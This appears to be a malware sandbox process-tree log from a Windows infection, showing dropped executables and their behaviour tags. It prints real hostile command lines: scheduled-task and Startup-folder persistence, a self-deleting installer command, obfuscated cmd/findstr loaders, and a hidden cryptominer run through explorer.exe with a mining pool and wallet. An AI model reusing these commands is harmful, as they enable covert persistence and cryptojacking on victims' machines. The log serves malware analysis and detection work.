C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" T~DJNB.F -u /S16⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\ic4T1sXBQQ9VwWcLBg86dEs1.exe"C:\Users\Admin\Documents\ic4T1sXBQQ9VwWcLBg86dEs1.exe"12⤵
-
C:\ProgramData\8076914.exe"C:\ProgramData\8076914.exe"13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2864 -s 220414⤵
- Program crash
-
-
-
C:\ProgramData\7271400.exe"C:\ProgramData\7271400.exe"13⤵
-
-
C:\ProgramData\6660737.exe"C:\ProgramData\6660737.exe"13⤵
-
-
C:\ProgramData\6573271.exe"C:\ProgramData\6573271.exe"13⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵
-
-
-
C:\ProgramData\7952682.exe"C:\ProgramData\7952682.exe"13⤵
-
-
C:\ProgramData\8544614.exe"C:\ProgramData\8544614.exe"13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7040 -s 244414⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\MEBhyA9ExX3ZGTDRhZapc7gX.exe"C:\Users\Admin\Documents\MEBhyA9ExX3ZGTDRhZapc7gX.exe" /mixtwo12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 28013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\rB7YAEcxqvfboWFIChw7SknK.exe"C:\Users\Admin\Documents\rB7YAEcxqvfboWFIChw7SknK.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7156 -s 28413⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST11⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST11⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Documents\LRoXTm1w9chnZeLNYcoRxOl9.exe"C:\Users\Admin\Documents\LRoXTm1w9chnZeLNYcoRxOl9.exe"10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 26411⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\L_dFCR57YjeCutBXnOX8MoPb.exe"C:\Users\Admin\Documents\L_dFCR57YjeCutBXnOX8MoPb.exe"10⤵
-
C:\Users\Admin\AppData\Local\Temp\{17F2E73D-CD0D-4D3B-A20A-CB2290FC4836}\L_dFCR57YjeCutBXnOX8MoPb.exeC:\Users\Admin\AppData\Local\Temp\{17F2E73D-CD0D-4D3B-A20A-CB2290FC4836}\L_dFCR57YjeCutBXnOX8MoPb.exe /q"C:\Users\Admin\Documents\L_dFCR57YjeCutBXnOX8MoPb.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{17F2E73D-CD0D-4D3B-A20A-CB2290FC4836}" /IS_temp11⤵
-
C:\Windows\SysWOW64\MSIEXEC.EXE"C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\Documents\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="L_dFCR57YjeCutBXnOX8MoPb.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\MSI33D1.tmp"C:\Users\Admin\AppData\Local\Temp\MSI33D1.tmp"13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\MSI3382.tmp"C:\Users\Admin\AppData\Local\Temp\MSI3382.tmp"13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\MSI32E5.tmp"C:\Users\Admin\AppData\Local\Temp\MSI32E5.tmp"13⤵
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"9⤵
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 10010⤵
- Runs ping.exe
-
-
C:\Windows\system32\PING.EXEping 1.1.1.1 -n 1 -w 90010⤵
- Runs ping.exe
-
-
-
-
C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-LKU1R.tmp\stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-LKU1R.tmp\stats.tmp" /SL5="$202C0,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2412 -s 2846⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu214aaca5625.exeThu214aaca5625.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv hT4RkUrQU0KJr6hWfqbv1w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu214ce31cede21.exeThu214ce31cede21.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-K8C3Q.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-K8C3Q.tmp\Thu214aaca5625.tmp" /SL5="$300A6,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu214aaca5625.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-4QB08.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-4QB08.tmp\46807GHF____.exe" /S /UID=burnerch22⤵
- Executes dropped EXE
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 15323⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu21568b0ab8.exeThu21568b0ab8.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'6⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5472 -s 17284⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\6461474.exe"C:\ProgramData\6461474.exe"4⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5344 -s 23485⤵
- Program crash
-
-
-
C:\ProgramData\1191266.exe"C:\ProgramData\1191266.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
-
C:\ProgramData\6908558.exe"C:\ProgramData\6908558.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
-
C:\ProgramData\6694975.exe"C:\ProgramData\6694975.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 3165⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\ProgramData\3260034.exe"C:\ProgramData\3260034.exe"4⤵
-
-
C:\ProgramData\1338695.exe"C:\ProgramData\1338695.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 24685⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 6124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "5⤵
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\10⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\e0171c4c73\11⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe" /F10⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"9⤵
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 3124⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-AMP5E.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-AMP5E.tmp\setup_2.tmp" /SL5="$40134,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-DIEUN.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-DIEUN.tmp\setup_2.tmp" /SL5="$1038A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT6⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a4⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"3⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu2156de5489c19.exeThu2156de5489c19.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpF288_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpF288_tmp.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe3⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv3⤵
-
C:\Windows\SysWOW64\cmd.execmd4⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv5⤵
-
-
C:\Windows\SysWOW64\PING.EXEping localhost5⤵
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u7⤵
- Executes dropped EXE
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0B3DC483\Thu2164f292a11ce.exeThu2164f292a11ce.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 2962⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2412 -ip 24121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 2132 -ip 21321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1344 -ip 13441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2472 -ip 24721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5900 -ip 59001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1704 -ip 17041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 648 -p 5472 -ip 54721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5636 -ip 56361⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5500 -ip 55001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5932 -ip 59321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5160 -s 4523⤵
- Program crash
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5160 -ip 51601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1484 -ip 14841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 624 -p 2140 -ip 21401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 528 -p 5344 -ip 53441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5416 -ip 54161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 400 -ip 4001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5612 -ip 56121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 4563⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 3276 -ip 32761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9A4619FA27DB4379FD7F6380F92DC1B4 C2⤵
- Loads dropped DLL
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 19CEE736BC3232F63BD17F0C9EB600762⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding BEE4B847D9E959CA1338AB026E1ED9B4 E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D8594BB87728E6BC48CAC3450E37AF48 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1788886E7533694C6BBA7F91D3CCE60F2⤵
- Blocklisted process makes network request
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exeC:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7ff8792ddec0,0x7ff8792dded0,0x7ff8792ddee05⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=1752 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --mojo-platform-channel-handle=2204 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1624 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1576,8850393689127447124,9795977654152633847,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5904_381640663" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2600 /prefetch:15⤵
-
-
